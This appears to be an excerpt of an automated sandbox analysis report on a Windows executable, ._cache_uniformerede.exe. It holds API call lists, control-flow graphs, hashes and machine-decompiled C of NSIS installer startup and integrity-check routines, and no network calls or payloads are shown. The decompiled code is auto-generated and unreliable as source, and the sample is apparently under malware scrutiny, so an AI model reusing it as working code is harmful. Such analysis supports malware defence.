                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041bb
                                                                                                                                                                                                                            0x00404179
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404181
                                                                                                                                                                                                                            0x00404160
                                                                                                                                                                                                                            0x00404166
                                                                                                                                                                                                                            0x0040456e
                                                                                                                                                                                                                            0x00404574
                                                                                                                                                                                                                            0x00404581
                                                                                                                                                                                                                            0x00404587
                                                                                                                                                                                                                            0x00404587
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404110
                                                                                                                                                                                                                            0x00404115
                                                                                                                                                                                                                            0x00404121
                                                                                                                                                                                                                            0x0040412a
                                                                                                                                                                                                                            0x0040422b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404149
                                                                                                                                                                                                                            0x0040414c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040414c
                                                                                                                                                                                                                            0x0040412a
                                                                                                                                                                                                                            0x0040410e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00404121
                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00404160
                                                                                                                                                                                                                            • SetWindowLongW.USER32 ref: 00404179
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404198
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 0040425E
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404268
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404379
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                                                                                                                                                            • EnableMenuItem.USER32 ref: 004043E4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                            • String ID: H7B
                                                                                                                                                                                                                            • API String ID: 3618520773-2300413410
                                                                                                                                                                                                                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                                                                                                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 314 403d9d-403dc6 call 403fed call 40603f 304->314 310 403d92-403d98 lstrcatW 305->310 311 403d7c-403d8d call 406536 305->311 310->314 311->310 319 403e58-403e60 call 40603f 314->319 320 403dcc-403dd1 314->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 322 403dd7-403dff call 406536 320->322 322->319 328 403e01-403e05 322->328 326->327 330 403f14-403f1c call 40140b 327->330 331 403e95-403ec5 RegisterClassW 327->331 332 403e17-403e23 lstrlenW 328->332 333 403e07-403e14 call 405f64 328->333 344 403f26-403f31 call 403fed 330->344 345 403f1e-403f21 330->345 334 403fe3 331->334 335 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->335 339 403e25-403e33 lstrcmpiW 332->339 340 403e4b-403e53 call 405f37 call 406668 332->340 333->332 338 403fe5-403fec 334->338 335->330 339->340 343 403e35-403e3f GetFileAttributesW 339->343 340->319 347 403e41-403e43 343->347 348 403e45-403e46 call 405f83 343->348 354 403f37-403f51 ShowWindow call 4069c5 344->354 355 403fba-403fbb call 40579d 344->355 345->338 347->340 347->348 348->340 360 403f53-403f58 call 4069c5 354->360 361 403f5d-403f6f GetClassInfoW 354->361 359 403fc0-403fc2 355->359 362 403fc4-403fca 359->362 363 403fdc-403fde call 40140b 359->363 360->361 366 403f71-403f81 GetClassInfoW RegisterClassW 361->366 367 403f87-403faa DialogBoxParamW call 40140b 361->367 362->345 368 403fd0-403fd7 call 40140b 362->368 363->334 366->367 372 403faf-403fb8 call 403c67 367->372 368->345 372->338
                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                            			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                                                                                                                                                            0x00403d1d
                                                                                                                                                                                                                            0x00403d26
                                                                                                                                                                                                                            0x00403d2d
                                                                                                                                                                                                                            0x00403d2f
                                                                                                                                                                                                                            0x00403d43
                                                                                                                                                                                                                            0x00403d55
                                                                                                                                                                                                                            0x00403d5e
                                                                                                                                                                                                                            0x00403d67
                                                                                                                                                                                                                            0x00403d6e
                                                                                                                                                                                                                            0x00403d73
                                                                                                                                                                                                                            0x00403d7a
                                                                                                                                                                                                                            0x00403d8d
                                                                                                                                                                                                                            0x00403d8d
                                                                                                                                                                                                                            0x00403d98
                                                                                                                                                                                                                            0x00403d31
                                                                                                                                                                                                                            0x00403d3c
                                                                                                                                                                                                                            0x00403d3c
                                                                                                                                                                                                                            0x00403d9d
                                                                                                                                                                                                                            0x00403da7
                                                                                                                                                                                                                            0x00403db0
                                                                                                                                                                                                                            0x00403db5
                                                                                                                                                                                                                            0x00403dc6
                                                                                                                                                                                                                            0x00403e58
                                                                                                                                                                                                                            0x00403e60
                                                                                                                                                                                                                            0x00403e69
                                                                                                                                                                                                                            0x00403e69
                                                                                                                                                                                                                            0x00403e7f
                                                                                                                                                                                                                            0x00403e85
                                                                                                                                                                                                                            0x00403e93
                                                                                                                                                                                                                            0x00403f14
                                                                                                                                                                                                                            0x00403f1c
                                                                                                                                                                                                                            0x00403f26
                                                                                                                                                                                                                            0x00403f2b
                                                                                                                                                                                                                            0x00403f31
                                                                                                                                                                                                                            0x00403fbb
                                                                                                                                                                                                                            0x00403fc0
                                                                                                                                                                                                                            0x00403fc2
                                                                                                                                                                                                                            0x00403fde
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fde
                                                                                                                                                                                                                            0x00403fc4
                                                                                                                                                                                                                            0x00403fca
                                                                                                                                                                                                                            0x00403fd2
                                                                                                                                                                                                                            0x00403fd2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fca
                                                                                                                                                                                                                            0x00403f3f
                                                                                                                                                                                                                            0x00403f4a
                                                                                                                                                                                                                            0x00403f4f
                                                                                                                                                                                                                            0x00403f51
                                                                                                                                                                                                                            0x00403f58
                                                                                                                                                                                                                            0x00403f58
                                                                                                                                                                                                                            0x00403f63
                                                                                                                                                                                                                            0x00403f6b
                                                                                                                                                                                                                            0x00403f6d
                                                                                                                                                                                                                            0x00403f6f
                                                                                                                                                                                                                            0x00403f78
                                                                                                                                                                                                                            0x00403f7b
                                                                                                                                                                                                                            0x00403f81
                                                                                                                                                                                                                            0x00403f81
                                                                                                                                                                                                                            0x00403fa0
                                                                                                                                                                                                                            0x00403fb1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fb6
                                                                                                                                                                                                                            0x00403f1e
                                                                                                                                                                                                                            0x00403f20
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e95
                                                                                                                                                                                                                            0x00403e95
                                                                                                                                                                                                                            0x00403ea1
                                                                                                                                                                                                                            0x00403eab
                                                                                                                                                                                                                            0x00403eb1
                                                                                                                                                                                                                            0x00403eb6
                                                                                                                                                                                                                            0x00403ec5
                                                                                                                                                                                                                            0x00403fe3
                                                                                                                                                                                                                            0x00403fe3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403fe3
                                                                                                                                                                                                                            0x00403ed4
                                                                                                                                                                                                                            0x00403f0f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403f0f
                                                                                                                                                                                                                            0x00403dcc
                                                                                                                                                                                                                            0x00403dcc
                                                                                                                                                                                                                            0x00403dcf
                                                                                                                                                                                                                            0x00403dd1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403ddf
                                                                                                                                                                                                                            0x00403df1
                                                                                                                                                                                                                            0x00403df6
                                                                                                                                                                                                                            0x00403dff
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e05
                                                                                                                                                                                                                            0x00403e07
                                                                                                                                                                                                                            0x00403e14
                                                                                                                                                                                                                            0x00403e14
                                                                                                                                                                                                                            0x00403e1d
                                                                                                                                                                                                                            0x00403e23
                                                                                                                                                                                                                            0x00403e4b
                                                                                                                                                                                                                            0x00403e53
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e35
                                                                                                                                                                                                                            0x00403e36
                                                                                                                                                                                                                            0x00403e3f
                                                                                                                                                                                                                            0x00403e45
                                                                                                                                                                                                                            0x00403e46
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e46
                                                                                                                                                                                                                            0x00403e41
                                                                                                                                                                                                                            0x00403e43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403e43
                                                                                                                                                                                                                            0x00403e23

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                                                                                                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7620FAA0), ref: 00403E18
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                                                                                                                                                            • LoadImageW.USER32 ref: 00403E7F
                                                                                                                                                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                                                                                                                            • RegisterClassW.USER32 ref: 00403EBC
                                                                                                                                                                                                                            • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                                                                                                                                                                            • CreateWindowExW.USER32 ref: 00403F09
                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                                                                                                                                                            • GetClassInfoW.USER32 ref: 00403F6B
                                                                                                                                                                                                                            • GetClassInfoW.USER32 ref: 00403F78
                                                                                                                                                                                                                            • RegisterClassW.USER32 ref: 00403F81
                                                                                                                                                                                                                            • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                            • API String ID: 1975747703-2202534191
                                                                                                                                                                                                                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                                                                                                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 381 40336a-40336e 378->381 387 403243-403251 call 40302e 379->387 388 40315e 379->388 394 403322-403327 387->394 395 403257-40325a 387->395 390 403163-40317a 388->390 392 40317c 390->392 393 40317e-403187 call 4035e2 390->393 392->393 401 40318d-403194 393->401 402 4032de-4032e6 call 40302e 393->402 394->381 397 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 395->397 398 40325c-403274 call 4035f8 call 4035e2 395->398 422 4032d4-4032d9 397->422 423 4032e8-403318 call 4035f8 call 403371 397->423 398->394 425 40327a-403280 398->425 406 403210-403214 401->406 407 403196-4031aa call 406113 401->407 402->394 412 403216-40321d call 40302e 406->412 413 40321e-403224 406->413 407->413 421 4031ac-4031b3 407->421 412->413 418 403233-40323b 413->418 419 403226-403230 call 406b22 413->419 418->390 424 403241 418->424 419->418 421->413 429 4031b5-4031bc 421->429 422->381 436 40331d-403320 423->436 424->387 425->394 425->397 429->413 431 4031be-4031c5 429->431 431->413 433 4031c7-4031ce 431->433 433->413 435 4031d0-4031f0 433->435 435->394 437 4031f6-4031fa 435->437 436->394 438 403329-40333a 436->438 439 403202-40320a 437->439 440 4031fc-403200 437->440 441 403342-403347 438->441 442 40333c 438->442 439->413 443 40320c-40320e 439->443 440->424 440->439 444 403348-40334e 441->444 442->441 443->413 444->444 445 403350-403368 call 406113 444->445 445->381
                                                                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                                                                            			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					__eflags =  *0x42a274 - _t94;
					if( *0x42a274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
									__eflags =  *0x42a27c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x66cde
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x42a280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a274;
						if( *0x42a274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x5cd09
						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x5cfce
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}
































                                                                                                                                                                                                                            0x004030db
                                                                                                                                                                                                                            0x004030de
                                                                                                                                                                                                                            0x004030e1
                                                                                                                                                                                                                            0x004030fb
                                                                                                                                                                                                                            0x00403100
                                                                                                                                                                                                                            0x00403113
                                                                                                                                                                                                                            0x00403118
                                                                                                                                                                                                                            0x0040311e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403120
                                                                                                                                                                                                                            0x00403131
                                                                                                                                                                                                                            0x00403142
                                                                                                                                                                                                                            0x00403149
                                                                                                                                                                                                                            0x0040314f
                                                                                                                                                                                                                            0x00403151
                                                                                                                                                                                                                            0x00403156
                                                                                                                                                                                                                            0x00403158
                                                                                                                                                                                                                            0x00403243
                                                                                                                                                                                                                            0x00403245
                                                                                                                                                                                                                            0x0040324a
                                                                                                                                                                                                                            0x00403251
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403257
                                                                                                                                                                                                                            0x0040325a
                                                                                                                                                                                                                            0x00403286
                                                                                                                                                                                                                            0x0040328b
                                                                                                                                                                                                                            0x00403296
                                                                                                                                                                                                                            0x00403298
                                                                                                                                                                                                                            0x004032a9
                                                                                                                                                                                                                            0x004032c4
                                                                                                                                                                                                                            0x004032ca
                                                                                                                                                                                                                            0x004032cd
                                                                                                                                                                                                                            0x004032d2
                                                                                                                                                                                                                            0x004032f1
                                                                                                                                                                                                                            0x00403301
